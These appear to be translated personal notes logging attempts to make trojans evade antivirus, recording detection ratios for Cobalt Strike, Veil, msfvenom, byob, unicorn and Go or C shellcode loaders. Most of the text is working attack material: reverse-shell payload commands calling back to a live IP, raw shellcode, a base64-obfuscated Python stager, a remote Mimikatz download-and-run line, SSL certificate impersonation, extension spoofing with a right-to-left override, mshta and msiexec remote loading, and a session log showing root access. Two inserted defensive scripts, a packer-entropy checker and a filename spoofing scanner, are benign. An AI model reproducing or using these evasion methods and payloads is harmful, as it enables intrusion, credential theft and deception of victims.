Conventional trojan AV-evasion attempts: detection results log


CS (Cobalt Strike) trojan detection ratio (VirusTotal detections / engines)

exe64 41/72
exe32 40/72

After adding UPX:

cs64: 30/72, passes Huorong (火绒), does not pass Windows Defender
self-extracting archive: 23/71, passes Huorong, does not pass Windows Defender (success)
cs86: 45/72, detected by Huorong, does not pass Windows Defender
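For the defender's side of these scores, here is an added example written for this page (it is not part of the original notes): a minimal PE section inspector that reports the two cheap indicators most of the UPX-packed samples above would trip, UPX section names and high per-section entropy. The PE bytes it checks are constructed by build_sample_pe (a header skeleton with a couple of sections, not a real binary), and all function names are this example's own.

```python
import math
import struct

# Section names left behind by the UPX packer.
UPX_SECTION_NAMES = {b"UPX0", b"UPX1", b"UPX2"}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: plain code/text sits around 4-6.5, packed or encrypted data near 8."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def pe_sections(pe: bytes):
    """Walk the COFF section table of a PE image and yield (name, raw_bytes)."""
    if pe[:2] != b"MZ":
        raise ValueError("not a PE file (missing MZ header)")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_header_size = struct.unpack_from("<H", pe, coff + 16)[0]
    table = coff + 20 + opt_header_size
    for i in range(num_sections):
        hdr = table + 40 * i
        name = pe[hdr:hdr + 8].rstrip(b"\0")
        raw_size, raw_ptr = struct.unpack_from("<II", pe, hdr + 16)
        yield name, pe[raw_ptr:raw_ptr + raw_size]


def packer_indicators(pe: bytes, entropy_threshold: float = 7.0) -> dict:
    """Return the UPX-named and high-entropy sections of a PE plus an overall verdict."""
    findings = {"upx_sections": [], "high_entropy_sections": []}
    for name, raw in pe_sections(pe):
        label = name.decode("ascii", "replace")
        if name in UPX_SECTION_NAMES:
            findings["upx_sections"].append(label)
        if shannon_entropy(raw) >= entropy_threshold:
            findings["high_entropy_sections"].append(label)
    findings["suspicious"] = bool(findings["upx_sections"] or findings["high_entropy_sections"])
    return findings


def build_sample_pe(sections) -> bytes:
    """Construct a skeletal PE (DOS stub, PE signature, COFF header with no optional
    header, section table, raw data) so the inspector can be exercised offline.
    This is test scaffolding, not a loadable executable."""
    dos = bytearray(b"MZ" + b"\0" * 62)
    e_lfanew = 64
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x8664, len(sections), 0, 0, 0, 0, 0)
    raw_ptr = e_lfanew + 4 + 20 + 40 * len(sections)
    headers, blobs = b"", b""
    for name, data in sections:
        headers += struct.pack("<8sIIII", name, len(data), 0x1000, len(data), raw_ptr) + b"\0" * 16
        raw_ptr += len(data)
        blobs += data
    return bytes(dos) + b"PE\0\0" + coff + headers + blobs


if __name__ == "__main__":
    # Constructed sample: one ordinary text section and one UPX-named, maximally random section.
    packed = build_sample_pe([(b".text", b"ordinary program text " * 64),
                              (b"UPX1", bytes(range(256)) * 8)])
    print(packer_indicators(packed))
```

Section names are trivially renamed by a packer author, so the entropy check is the one that carries over to the AES/XOR crypters later on this page; a legitimate installer with compressed resources will also score high, so treat either indicator as a triage signal, not a verdict.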

veil

Install Docker:

```bash
# Add the Docker PGP key:
curl -fsSL https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/debian/gpg | sudo apt-key add -

# Configure the Docker APT repository:
echo 'deb https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/debian/ buster stable' | sudo tee /etc/apt/sources.list.d/docker.list

apt-get update
apt-get remove docker docker-engine docker.io
apt-get install docker-ce

systemctl start docker
systemctl enable docker
```

Install Veil and pull the Veil image:

```bash
apt -y install veil
/usr/share/veil/config/setup.sh --force --silent
```

Image address:
https://hub.docker.com/r/mattiasohlsson/veil/

```bash
mousepad /etc/docker/daemon.json
```

```json
{
    "registry-mirrors": [
        "https://1nj0zren.mirror.aliyuncs.com",
        "https://docker.mirrors.ustc.edu.cn",
        "http://f1361db2.m.daocloud.io",
        "https://registry.docker-cn.com"
    ]
}
```

```bash
systemctl daemon-reload
systemctl restart docker

docker pull mattiasohlsson/veil
```

Start the container:

The option -v /tmp/veil-output:/var/lib/veil/output:Z maps the host's /tmp/veil-output directory into the container, so the payloads Veil generates can be used directly on the host.

```bash
docker run -it -v /tmp/veil-output:/var/lib/veil/output:Z mattiasohlsson/veil
```

Usage:

Veil has two evasion tools, Evasion and Ordnance.
Ordnance generates shellcode for use in Veil-Evasion; Evasion is the one that produces evasive executables.

```
Veil>: use 1                   # select the Evasion tool
Veil/Evasion>: list            # list the available payloads
```

Generating an exe directly with Veil

```
Veil/Evasion>: use 16
Name: Pure Golang Reverse TCP Stager

set lhost 45.32.137.154
set lport 4466
generate

root@kali:/tmp/veil-output# tree
.
├── catapult
├── compiled
│   └── go_msf.exe
├── handlers
│   └── go_msf.rc
├── hashes.txt
└── source
    └── go_msf.go

root@kali:/tmp/veil-output# cat handlers/go_msf.rc
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 45.32.137.154
set LPORT 4466
set ExitOnSession false
exploit -j
```

The generated exe is detected by Huorong, and it is still detected by Huorong after UPX packing. Awkward.

After UPX packing: VirusTotal detection rate 37/68

  • veil+mingw+w64 (success)

```
Veil>: use 1

Veil-Evasion command: use 7    # select payload c/meterpreter/rev_tcp.py

set lhost 45.32.137.154
set lport 4466
generate
```

Compile it with mingw-w64:

```bash
gcc c_msf.c -o c_msf.exe -l ws2_32
```

Huorong detects the exe file.

After UPX packing (not detected by Huorong): VirusTotal detection rate 7/68

The shell that called back to msf could not execute commands? A failure.

Load the .rc file with msfconsole -r.

msf apk

VirusTotal detection rate: 29/63

Detection ratio without any evasion: 57/72

```bash
msfvenom -p android/meterpreter/reverse_tcp LHOST=45.32.137.154 LPORT=5566 R > test.apk
```

shellter: evasion ineffective, and after processing the exe's original functionality no longer works.

msfvenom binding + encoder evasion

```bash
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 -b '\x00' lhost=45.32.137.154 lport=5566 -f exe -o en20.exe
```

Detection ratio after x86/shikata_ga_nai encoding: 57/72. Adding an encoder is completely ineffective.

shikata_ga_nai encoding + UPX packing: detection ratio 52/72, slightly lower.

Trying the byob botnet (python2)

```
python client.py 45.32.137.154 5566 --name test --compress --freeze --icon tom.jpg

hosting payload at: http://45.32.137.154:5567///payloads/m8V.py
hosting stager at: http://45.32.137.154:5567///stagers/m8V.py
```

The generated payloads go under the \modules folder, in two subfolders, one for payloads and one for stagers. Copy both folders straight into byob/byob/modules on Kali.

```
python server.py --host 45.32.137.154 --port 5566
```

At this point the server is up. Next, in another window, generate any trojan so that byob sets up the web server that stores the payload.

```
python client.py 45.32.137.154 5566 --name test1 --compress --freeze --icon tom.jpg

hosting payload at: http://45.32.137.154:5567//payloads/nBa.py

hosting stager at: http://45.32.137.154:5567//stagers/nBa.py
```

The service started successfully. Then put the payload and stager generated on Windows into their own directories (don't mix them up):

```
payload: ./byob/byob/modules/payloads

stagers: ./byob/byob/modules/stagers

http://45.32.137.154:5567//payloads/yCN.py

http://45.32.137.154:5567//stagers/yCN.py
```

Run the exe or the test.py file.

The exe or py generated in the python2 experiment gets past most AV, but the test target was on the internal network; no session came in from the internet, and the internet case was not tested.

byob detection ratio: 5/72

unicorn

Detection ratio: 19/72

```bash
python unicorn.py windows/meterpreter/reverse_https 45.32.137.154 443
```

Two files are generated in the unicorn directory: unicorn.rc and powershell_attack.txt. The latter is what has to be run on the target.

Convert it to bat format, then download the Windows 10 icons:

```bash
git clone 'https://github.com/B00merang-Project/Windows-10-Icons'
```

  • Extension spoofing

Pick text-x-generic.png under Windows-10-Icons/256x256/mimetypes/ and go to

https://convertico.com/

to convert the PNG to an ICON. Then open the BAT2EXE converter, open powershell_attack.bat and add notepad at the top:

Save it as a 64-bit Windows "invisible" text.exe.

Then disguise the file extension. First rename the file to texttxt.exe, then go to

https://unicode-table.com/en/202E/

and copy the right-to-left override character. The filename then displays as textexe.txt even though it is actually an executable; this trick fools target users even when file-extension display is turned on.
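The defender's counterpart to the override trick is to inspect filenames for bidirectional control characters and compare the extension the OS will use with the one the user sees. The following is an added example written for this page (not from the notes or any tool they mention); the sample filenames are constructed, and displayed_name only models the single-override case rather than the full Unicode bidi algorithm.

```python
# Bidi control characters that can change the order in which a name is drawn:
# LRE, RLE, PDF, LRO, RLO and the isolate forms LRI, RLI, FSI, PDI.
BIDI_CONTROLS = {"\u202a", "\u202b", "\u202c", "\u202d", "\u202e",
                 "\u2066", "\u2067", "\u2068", "\u2069"}

EXECUTABLE_EXTENSIONS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd",
                         ".ps1", ".vbs", ".js", ".hta", ".msi", ".dll"}


def _extension(name: str) -> str:
    dot = name.rfind(".")
    return name[dot:].lower() if dot != -1 else ""


def displayed_name(name: str) -> str:
    """Approximate what a file manager shows: after an RLO (U+202E) the rest of
    the name is drawn right to left until a PDF (U+202C) or the end of the
    string. This models the single-override trick; it is not a full
    implementation of the Unicode bidirectional algorithm."""
    out, i = "", 0
    while i < len(name):
        c = name[i]
        if c == "\u202e":
            end = name.find("\u202c", i + 1)
            if end == -1:
                end = len(name)
            out += name[i + 1:end][::-1]
            i = end + 1
        elif c in BIDI_CONTROLS:
            i += 1  # other controls are invisible; drop them
        else:
            out += c
            i += 1
    return out


def analyse_filename(name: str) -> dict:
    """Compare the name the OS stores (and uses to pick a handler) with the name a user sees."""
    stored = "".join(c for c in name if c not in BIDI_CONTROLS)
    shown = displayed_name(name)
    controls = sorted({"U+%04X" % ord(c) for c in name if c in BIDI_CONTROLS})
    real_ext, shown_ext = _extension(stored), _extension(shown)
    return {
        "stored_name": stored,
        "displayed_name": shown,
        "bidi_controls": controls,
        "real_extension": real_ext,
        "displayed_extension": shown_ext,
        "has_bidi_control": bool(controls),
        "spoofed": bool(controls) and real_ext != shown_ext,
        "executable": real_ext in EXECUTABLE_EXTENSIONS,
    }


def scan_filenames(names):
    """Return the analysis of every name that carries a bidi control character."""
    return [r for r in map(analyse_filename, names) if r["has_bidi_control"]]


if __name__ == "__main__":
    # Constructed sample: the "texttxt.exe" + RLO case from the notes, plus two benign names.
    samples = ["text\u202etxt.exe", "report.txt", "setup.exe"]
    for finding in scan_filenames(samples):
        print(finding)
```

Any bidi control in a filename is worth an alert on its own, since there is no legitimate reason for one in a downloaded attachment; the spoofed flag additionally tells the analyst that the visible extension and the real one disagree.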

```
msfconsole -r unicorn.rc

load stdapi

shell
```

The shell cannot be thrown back to the external VPS?

gobindshell (success)

Detection ratio: 2/69

go-shellcode

The compiled exe is detected.

+UPX: size halved, passes Huorong.

```bash
msfvenom -p windows/meterpreter/reverse_tcp -f hex -o rev.hex LHOST=45.32.137.154 LPORT=2234
```

It evades AV, but in-memory loading failed and no shell came back?

shellcode-launcher (x)

C++ loading shellcode

```bash
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=45.32.137.154 lport=2234 -f raw -o shellcode.raw
```

Still detected by Huorong after UPX.

k8 scrun

Python loading shellcode

Not flagged after UPX.

```bash
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=45.32.137.154 lport=2234 -f c -o shell.c
```

The generated shell.c still needs hex encoding.

scrun.exe exits on launch; the program does not work properly.

go_meterpreter

https://github.com/insightglacier/go_meterpreter

```
go build -ldflags="-H windowsgui -w" .\go_meterpreter.go

# the program built with this command makes sessions die

go build .\go_meterpreter.go

# dies as well
```

```
LHOST  45.32.137.154    yes       The listen address (an interface may be specified)
LPORT  2234             yes       The listen port
```

windows/meterpreter/reverse_tcp

+UPX: detection ratio 9/71

Downside: the session dies when calling back to the internet; not tested on the internal network.

PowerShell remote-loading mimikatz to read passwords

```powershell
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz >> c:\1.txt
```

SimpleShellcodeInjector loader

https://github.com/DimopoulosElias/SimpleShellcodeInjector

Huorong flags it; both the UPX-packed and the unpacked program crash on launch.

```
$ i686-w64-mingw32-gcc SimpleShellcodeInjector.c -o ssi.exe
$ msfvenom -p windows/meterpreter/reverse_https LHOST=45.32.137.154 LPORT=2234 -f c -o msf.txt
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 545 bytes
Final size of c file: 2315 bytes
Saved as: msf.txt

$ cat msf.txt|grep -v unsigned|sed "s/\"\\\x//g"|sed "s/\\\x//g"|sed "s/\"//g"|sed ':a;N;$!ba;s/\n//g'|sed "s/;//g"
```

msf:

SSL impersonation:

```
$ msfconsole
msf exploit(multi/handler) > use auxiliary/gather/impersonate_ssl
msf auxiliary(gather/impersonate_ssl) > set RHOST www.google.com
RHOST => www.google.com
msf auxiliary(gather/impersonate_ssl) > run

[*] www.google.com:443 - Connecting to www.google.com:443
[*] www.google.com:443 - Copying certificate from www.google.com:443
/C=US/ST=California/L=Mountain View/O=Google LLC/CN=www.google.com
[*] www.google.com:443 - Beginning export of certificate files
[*] www.google.com:443 - Creating looted key/crt/pem files for www.google.com:443
[+] www.google.com:443 - key: /home/gweeperx/.msf4/loot/20180816131826_default_216.58.212.36_www.google.com_k_829605.key
[+] www.google.com:443 - crt: /home/gweeperx/.msf4/loot/20180816131827_default_216.58.212.36_www.google.com_c_997519.crt
[+] www.google.com:443 - pem: /home/gweeperx/.msf4/loot/20180816131827_default_216.58.212.36_www.google.com_p_032017.pem
[*] Auxiliary module execution completed
```

Handler:

```
msf auxiliary(gather/impersonate_ssl) > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf exploit(multi/handler) > set HandlerSSLCert /home/gweeperx/.msf4/loot/20180816131827_default_216.58.212.36_www.google.com_p_032017.pem
HandlerSSLCert => /home/gweeperx/.msf4/loot/20180816131827_default_216.58.212.36_www.google.com_p_032017.pem
msf exploit(multi/handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf exploit(multi/handler) > set LPORT 443
LPORT => 443
msf exploit(multi/handler) > run

[*] Started reverse TCP handler on 0.0.0.0:443
```

Python loader

```python
import base64,sys
import ctypes

whnd = ctypes.windll.kernel32.GetConsoleWindow()
if whnd != 0:
    ctypes.windll.user32.ShowWindow(whnd, 0)
    ctypes.windll.kernel32.CloseHandle(whnd)

exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzQ1LjMyLjEzNy4xNTQnLDIyMzQpKQoJCWJyZWFrCglleGNlcHQ6CgkJdGltZS5zbGVlcCg1KQpsPXN0cnVjdC51bnBhY2soJz5JJyxzLnJlY3YoNCkpWzBdCmQ9cy5yZWN2KGwpCndoaWxlIGxlbihkKTxsOgoJZCs9cy5yZWN2KGwtbGVuKGQpKQpleGVjKGQseydzJzpzfSk=')))
```

After base64 decoding:

```python
import socket,struct,time
for x in range(10):
    try:
        s=socket.socket(2,socket.SOCK_STREAM)
        s.connect(('45.32.137.154',2234))
        break
    except:
        time.sleep(5)
l=struct.unpack('>I',s.recv(4))[0]
d=s.recv(l)
while len(d)<l:
    d+=s.recv(l-len(d))
exec(d,{'s':s})
```

It connects, but cannot execute commands; does the code need further changes?

Go inline C loading + Go-embedded shellcode

Installing gcc/g++ on Windows

  • goshell (success)

Detection ratio: 15/64

```bash
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=45.32.137.154 lport=2234 -f c
```

```c
"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f\x85\x72\x00\x00\x00\x8b"
"\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b"
"\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41"
"\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1"
"\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45"
"\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b"
"\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48"
"\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9"
"\x4b\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33\x32\x00\x00"
"\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49\x89\xe5"
"\x49\xbc\x02\x00\x08\xba\x2d\x20\x89\x9a\x41\x54\x49\x89\xe4"
"\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c\x89\xea\x68"
"\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff\xd5\x6a\x0a"
"\x41\x5e\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89"
"\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5"
"\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba"
"\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\x49\xff\xce\x75\xe5"
"\xe8\x93\x00\x00\x00\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9"
"\x6a\x04\x41\x58\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5"
"\x83\xf8\x00\x7e\x55\x48\x83\xc4\x20\x5e\x89\xf6\x6a\x40\x41"
"\x59\x68\x00\x10\x00\x00\x41\x58\x48\x89\xf2\x48\x31\xc9\x41"
"\xba\x58\xa4\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31"
"\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba\x02\xd9\xc8"
"\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x41\x57\x59\x68\x00\x40"
"\x00\x00\x41\x58\x6a\x00\x5a\x41\xba\x0b\x2f\x0f\x30\xff\xd5"
"\x57\x59\x41\xba\x75\x6e\x4d\x61\xff\xd5\x49\xff\xce\xe9\x3c"
"\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6\x75\xb4\x41"
"\xff\xe7\x58\x6a\x00\x59\x49\xc7\xc2\xf0\xb5\xa2\x56\xff\xd5"
```

```bash
go build -ldflags="-H windowsgui -w"
```

Source: see goshell.

After UPX packing, the msf session from the internet came in successfully.

  • cingo

64-bit gcc install

64 bit gcc

```bash
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=45.32.137.154 lport=2234 -f c
```

(The msfvenom output is the same shellcode listing as in the goshell section above.)

Requires 64-bit gcc.

```go
package main

import "C"
import "unsafe"

func main() {
    buf := ""
    buf += "\xdd\xc6\xd9\x74\x24\xf4\x5f\x33\xc9\xb8\xb3\x5e\x2c"
    ...
    buf += "\xc9\xb1\x97\x31\x47\x1a\x03\x47\x1a\x83\xc7\x04\xe2"
    shellcode := []byte(buf)
    C.call((*C.char)(unsafe.Pointer(&shellcode[0])))
}
```

Needs to call C code; still to be completed.

Calling C code from Go

go-AES-shellcode (success)

A Trinity of Shellcode, AES & Golang

0x14-SLAE64-crypter

  • Compiling gocrypter on Windows fails:

```
shellcoderun\shellcoderun.go:5:10: fatal error: sys/mman.h: No such file or directory
```

Reason:

<sys/mman.h> is a Unix header and is not available on Windows.

  • Compile on Linux (the shell only comes back on a Linux machine)

Compiled successfully.

Generate the payload:

```bash
msfvenom -a x64 --platform linux -p linux/x64/shell_reverse_tcp LHOST=45.32.137.154 LPORT=2344 > gocryptpayload
```

```
root@kali:~/go-crypter# cat gocryptpayload | xxd
00000000: 6a29 5899 6a02 5f6a 015e 0f05 4897 48b9  j)X.j._j.^..H.H.
00000010: 0200 0928 2d20 899a 5148 89e6 6a10 5a6a  ...(- ..QH..j.Zj
00000020: 2a58 0f05 6a03 5e48 ffce 6a21 580f 0575  *X..j.^H..j!X..u
00000030: f66a 3b58 9948 bb2f 6269 6e2f 7368 0053  .j;X.H./bin/sh.S
00000040: 4889 e752 5748 89e6 0f05                 H..RWH....
```

AES-encrypt the payload:

```
root@kali:~/go-crypter# ./go-crypter encrypt "lucifer110000000" gocryptpayload
Reading from file at gocryptpayload
Input size is: 74 bytes
Key size is: 16 bytes
Calling encrypt...
Result size is: 96 bytes
Saved to gocrypter.111526.out
root@kali:~/go-crypter# cat gocrypter.111526.out | xxd
00000000: aab9 7c35 31e4 b4ba d0a0 2551 44ec 373d  ..|51.....%QD.7=
00000010: c3da 0026 ba7c bb5a 11d8 4b73 41bf bf50  ...&.|.Z..KsA..P
00000020: dce1 64a8 bf65 712a fba4 5e04 0780 3b8f  ..d..eq*..^...;.
00000030: 56ac 1f9b cf98 db99 edc6 6a95 dbb1 b538  V.........j....8
00000040: aebf 740e 93ca cda6 42ec ebf7 d1a9 56c2  ..t.....B.....V.
00000050: 9517 b1ac fd51 c14b 28ad 886c beb8 a0f8  .....Q.K(..l....
```

Decrypt the payload:

```
root@kali:~/go-crypter# ./go-crypter decrypt "lucifer110000000" gocrypter.111526.out
Reading from file at gocrypter.111526.out
Input size is: 96 bytes
Key size is: 16 bytes
Calling decrypt...
Result size is: 74 bytes
Saved to gocrypter.111737.out
root@kali:~/go-crypter# cat gocrypter.111737.out | xxd
00000000: 6a29 5899 6a02 5f6a 015e 0f05 4897 48b9  j)X.j._j.^..H.H.
00000010: 0200 0928 2d20 899a 5148 89e6 6a10 5a6a  ...(- ..QH..j.Zj
00000020: 2a58 0f05 6a03 5e48 ffce 6a21 580f 0575  *X..j.^H..j!X..u
00000030: f66a 3b58 9948 bb2f 6269 6e2f 7368 0053  .j;X.H./bin/sh.S
00000040: 4889 e752 5748 89e6 0f05                 H..RWH....
```

Run the payload:

```
root@kali:~/go-crypter# ./go-crypter run "lucifer110000000" gocrypter.111526.out
Reading from file at gocrypter.111526.out
Input size is: 96 bytes
Key size is: 16 bytes
Calling decrypt...
Result size is: 74 bytes
Calling run...
```

msf from the internet: success!!!

```
msf5 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type       Information  Connection
  --  ----  ----       -----------  ----------
  1         shell x64/linux         45.32.137.154:2344 -> 182.104.14.146:58604 (182.104.14.146)

msf5 exploit(multi/handler) > sessions 1
[*] Starting interaction with 1...

id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
ls
cli
crypter
go-crypter
gocrypter.111526.out
gocrypter.111737.out
gocrypter.go
gocryptpayload
shellcoderun
```

Listening with nc -lvp 2344 also works:

```
python -c 'import pty; pty.spawn("/bin/bash")'
root@kali:/root/go-crypter# id
id
uid=0(root) gid=0(root) groups=0(root)
root@kali:/root/go-crypter# whoami
whoami
root
```

Inserting shellcode

```cpp
#include <windows.h>
#include <iostream>
int main (int argc, char **argv) {
    char b[] = {/* insert the shellcode after XORing it with 'x', e.g.: 0x4C,0x4F, 0x4C */};
    char c[sizeof b];
    for (int i = 0; i < sizeof b; i++) {c[i] = b[i] ^ 'x';}
    void *exec = VirtualAlloc (0, sizeof c, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpy (exec, c, sizeof c);
    ((void(*)()) exec)();
}
```

CPLResourceRunner

Generate shellcode with Cobalt Strike:

Attacks -> Packages -> Windows Executable (s) -> Output => RAW (x86)

```bash
cat shellcode.txt | sed 's/[, ]//g; s/0x//g;' |tr -d '\n' | xxd -p -r | gzip -c | base64 > b64shellcode.txt
```

PowerShell loading (MMFml)

code:

```csharp
namespace mmfExeTwo
{
    using System;
    using System.IO.MemoryMappedFiles;
    using System.Runtime.InteropServices;

    class Program
    {

        private delegate IntPtr NewDelegate();

        // To handle the location by applying the appropriate type
        // We had to create a delegate to handle the pointer to the location where we shim in the shellcode
        // into the Memory Mapped File. This allows the location of the op code to be referenced later for execution
        private unsafe static IntPtr GetShellMemAddr()
        {
            // 64bit shell code. Tested on a win10 system. Injects "cmd -k calc"
            // was generated vanilla using "msfvenom -p windows/exec CMD="cmd /k calc" EXITFUNC=thread C -f powershell"
            var shellcode = new byte[]
            {
                0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,
                0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,
                0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,
                0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,
                0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x8b,0x80,0x88,
                0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,0x48,0x18,0x44,
                0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,
                0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,
                0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,
                0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,
                0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,
                0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,
                0x59,0x5a,0x48,0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,
                0x00,0x00,0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,
                0x6f,0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,
                0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,
                0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,0x63,0x00
            };

            MemoryMappedFile mmf = null;
            MemoryMappedViewAccessor viewaccessor = null;

            try
            {
                /* The try block creates the MMF and assigns the RWE permissions
                   The view accessor is created with matching permissions
                   the shell code from GetShellMemAddr is written to MMF
                   then the pointer is gained and a delegate is created to handle pointer value
                   so that it can be passed in terms of the returned function */

                mmf = MemoryMappedFile.CreateNew("__shellcode", shellcode.Length, MemoryMappedFileAccess.ReadWriteExecute);
                viewaccessor = mmf.CreateViewAccessor(0, shellcode.Length, MemoryMappedFileAccess.ReadWriteExecute);
                viewaccessor.WriteArray(0, shellcode, 0, shellcode.Length);
                var pointer = (byte*)0;
                viewaccessor.SafeMemoryMappedViewHandle.AcquirePointer(ref pointer);
                var func = (NewDelegate)Marshal.GetDelegateForFunctionPointer(new IntPtr(pointer), typeof(NewDelegate));
                return func();
            }
            catch
            {
                return IntPtr.Zero;
            }
            finally // You should always clean up after yourself :)
            {
                viewaccessor.Dispose();
                mmf.Dispose();
            }
        }

        static void Main(string[] args)
        {
            GetShellMemAddr();
        }
    }
}
```

```bash
msfvenom -p windows/x64/exec CMD="cmd.exe -c calc.exe" -f csharp
```

Invoke-MMFml

LOLBins: abusing trusted (whitelisted) binaries to load shellcode

Living-Off-the-Land Binaries

  • mshta

payload:

```bash
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.174.134 LPORT=53 -f raw > shellcode.bin

cat shellcode.bin | base64 -w 0

mshta.exe http://192.168.174.134/qing.hta
```

Replace the template.

Where the shellcode goes:

```
Dim code : code = ""
```

  • msiexec

Load the payload txt:

```
msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.174.134 LPORT=4444 -f msi > qing.txt

C:\Windows\System32\msiexec.exe /q /i http://192.168.174.134/qing.txt
```

Load a dll:

```
